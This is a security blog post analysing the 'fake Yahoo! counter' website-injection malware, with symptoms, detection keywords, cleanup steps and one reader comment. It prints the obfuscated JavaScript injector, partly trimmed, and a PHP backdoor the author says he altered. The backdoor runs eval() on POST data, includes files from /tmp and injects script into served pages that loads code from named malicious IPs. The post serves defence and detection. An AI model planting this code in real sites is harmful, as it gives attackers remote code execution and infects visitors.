msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Fake Yahoo Counter Script Unmasked

   12 Mar 09   Filed in Website exploits

Fake Yahoo! counter script injection has been the most “popular” security problem for the last couple of week in the “Malware & hacked sites” section of the Google’s webmaster help forum.

This script is not a new exploit but it looks like we have a new surge that affects thousands of sites, so I decided to review it.

Symptoms

  1. Some Antivirus tools may display virus alerts when people view your site.
  2. Google blacklists your site and display the “this site may harm your computer” warning next to links to your site in search results.
  3. Users of Firefox 3, Google Chrome and Safari cannot open your site. Instead of your web pages they see a big warning that your site is an attack site.
  4. As a result – traffic decrease.
  5. Google’s Safe Browsing diagnostics page for your site contains the following text:
    Malicious software is hosted on 6 domain(s), including 78 . 110 . 175 . 0/

Yahoo counter script

This IP address (78. 110. 175. 0) is a sign of the fake Yahoo! counter exploit that injects a malicious script into legitimate web pages under the disguise of a yahoo counter (hence the name).

The script looks like this (I removed some parts of the code):

<!-- Yahoo! Counter starts
if(typeof(yahoo_ counter)!=typeof(1))ev al(unescape('#/~/#%3Cdi~ v&%20!s&%74!y!%6C&e%3D~%...%3E').replace(/&|#|`|!|~|||@|$/g,""));var yahoo_counter=1;
<!-- counter end -->

When this script is executed it inserts another script that loads code from 195 .24 .76 .251 and 78 .110 .175 .21 . This is the address mentioned on the Google’s Safe Browsing page (they always replace the last byte of IP addresses with 0. That’s why you won’t see the real address of the malicious site that ends with 21).  195 .24 .76 .251 server is not responding and thus not mentioned on the Google’s diagnostics page.

PHP exploit

There is a PHP incarnation of this exploit. The following code can be injected into PHP files (I’ve slightly modified encrypted parts so that it can’t be abused):

<?php
if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0Pjwh...lNjNvbyU2QmBpZXwlMkVAJTZEJCU2MSU3NCU2MyU2OCUyOCQlMkZAJTVDYiMlNjh+Z2BmYHRAJTNEJiUzMSUyRiUyOSM9PSU2RUAlNzUlNkNgbCQlMjl+JTY2fCU2RmByJTI4fmkkJTNEJTMwJTNCfCU2OSQlM0MkJTMyJTNCJCU2OSUyQiUyQiUyOSU2NCZvY3wlNzUmJTZEYGVgJTZFIyU3NH4lMkVgd3xyJTY5ISU3NCU2NSMoYCUyMmAlM0MjJTczJTYzJnJpJTcwJCU3N...jMhdSU2RCElNjUlNkUmJTc0YC4mJTc3ciU2OX4lNzRAZSUyOCElNUMlMjJ+JTNDJCU3M0AlNjMlNzImJTY5JTcwdCYlMjAjJTY5fCU2NHw9JTVGfCUyMiUyQiU2OSUyQiYlMjJfJTIwcyU3MmMmPSElMkYlMkYlMjIrIyU2MX4lNUIlNjl8XStAIiUyRmNAcCQlMkZgJTNFfCUzQyU1QyU1QyYvJCU3MyQlNjMjcmklNzAhJTc0JCUzRSElNUMlMjJ8JTI5QCUzQyU1QyMlMkZzYyYlNzIlNjlwJTc0JTNFfCUyMiUyOSUzQlxuIy8jJTJGJTNDJi8hJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cfHxAfCN8YHxcJHxcIXx+fFw...t2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function
tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<s cript(.*?)</sc ript>#is',$s,$a))foreach($a[0]
as
$v)if(count(explode("n",$v))>5){$e=preg_match('#['"][^s'".,;?![]:/<>()]{30,}#',$v)||preg_match('#[([](s*d+,){20,}#',$v);if((preg_match('#bevalb#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD...haG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(s*</body)#mi',str_replace('$','\$',TMP_XHGFJOKL).'1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return
$g?gzencode($s):$s;}function
tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1)
as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo
$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>

I’m not a PHP expert but I can see that

  • there is a base64-encoded yahoo counter script that is injected into HTML code.
  • this code looks for files in a server’s temporary directory and tries to use them.  The names of the files are /tmp/m1 through /tmp/m99.  I don’t know what kind of code those files may contain. Maybe some instructions to infect other sites on the same server.

If you can dissect this PHP code, please let me know what exactly it does.

Detection

To detect this exploit you should scan all files on server (not on your computer) for the above script. You can use yahoo_counter as a keyword for the search.  If you are searching for the PHP exploit code, use tmp_lkojfghx as a keyword.

This exploit is now detectable by Unmask Parasites and you can check your web pages online.  If this script is detected you will see a warning that “suspicious inline script found” and there will be a snippet of the suspicious code in the “Suspicious Inline Scripts” section.

Yahoo counter script detected

Yahoo counter script detected by Unamsk Parasites

If you suspect that your site is hacked don’t try to open it in a web browser with enabled JavaScript. However, if you have a NoScript Firefox plugin you can detect the fake Yahoo counter exploit in your web browser.  You should allow scripts on your site (don’t choose allow everything). If you visit a page with the malicious script, you’ll see a warning that scripts from 195 .24 .76 .251 and 78 .110 .175 .21 have been blocked.

Don’t judge a book by its cover

It’s a common practice for hackers to hide malicious scripts making them look like something trusted.  This time they added a comment “Yahoo! Counter starts” and a variable yahoo_counter. Don’t be fooled by such tricks. Well known trusted words cannot make malicious scripts benign. It’s like label “Milk” won’t make a poison a healthy beverage.

Don’t trust anything you don’t remember to add into your site. Double-check everything. Ask your webmaster and other people responsible for your site.  Anyway, no matter how big and trusted Yahoo is, it can’t insert anything (and never does so) into your site.

By the way, reputable sites never offer obfuscated scripts to their clients.  In the fake yahoo counter script, everything except for words yahoo and counter is simply unreadable.  Legitimate scripts from Yahoo never look like this. Just compare with the real Yahoo! script used for the Yahoo! Web Analytics tracking code:

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js" ></script>
<script type="text/javascript">
YWATracker = YWA.getTracker("1000111111111");
YWATracker.setDocumentName("ITEMID");
YWATracker.setDocumentGroup("ProductView");
YWATracker.setDomains("*.store.yahoo.net");
YWATracker.setSKU("ITEMID");
YWATracker.setAction("PRODUCT_VIEW");
YWATracker.submit();
</script>

As you can see, this code is clean and doesn’t look like unintelligible string of random characters.

And by the way, as far as I know, there is no such thing as a genuine Yahoo! counter.

How to clean up?

This is not a definitive guide (I don’t have reliable information about how this exploit work), but the following steps may help you remove the malicious code and make your site more resilient to future attacks.

  1. Contact your hosting provider. If you are on a shared hosting plan, it could be that some other compromised account infects its neighbors. Let them investigate the issue and pay special attention to a files in a /tmp directory.
  2. Make sure your local computer is not infected (malware can steal passwords and modify local copies of web pages).
  3. Change all site passwords (FTP, Control Panel, etc.)
  4. Write-protect files and directories on server.
  5. Remove malicious code from your server files. The easiest way to do it is remove everything and then upload a clean version. You have a backup, haven’t you?
  6. When you believe your site is clean, request a review via Google’s Webmaster Tools.

If anyone has additional information about this fake Yahoo counter exploit, please leave your comments here.

Similar posts:

Reader's Comments (%)

  1. |

    I have the same problem on my website. I have removed the malicious code from all infected files.

    The problem is, I still do not know where the script came from or what caused it to be infected.

    Did my server get infected by a worm? What is it called and how does one go about with removing it?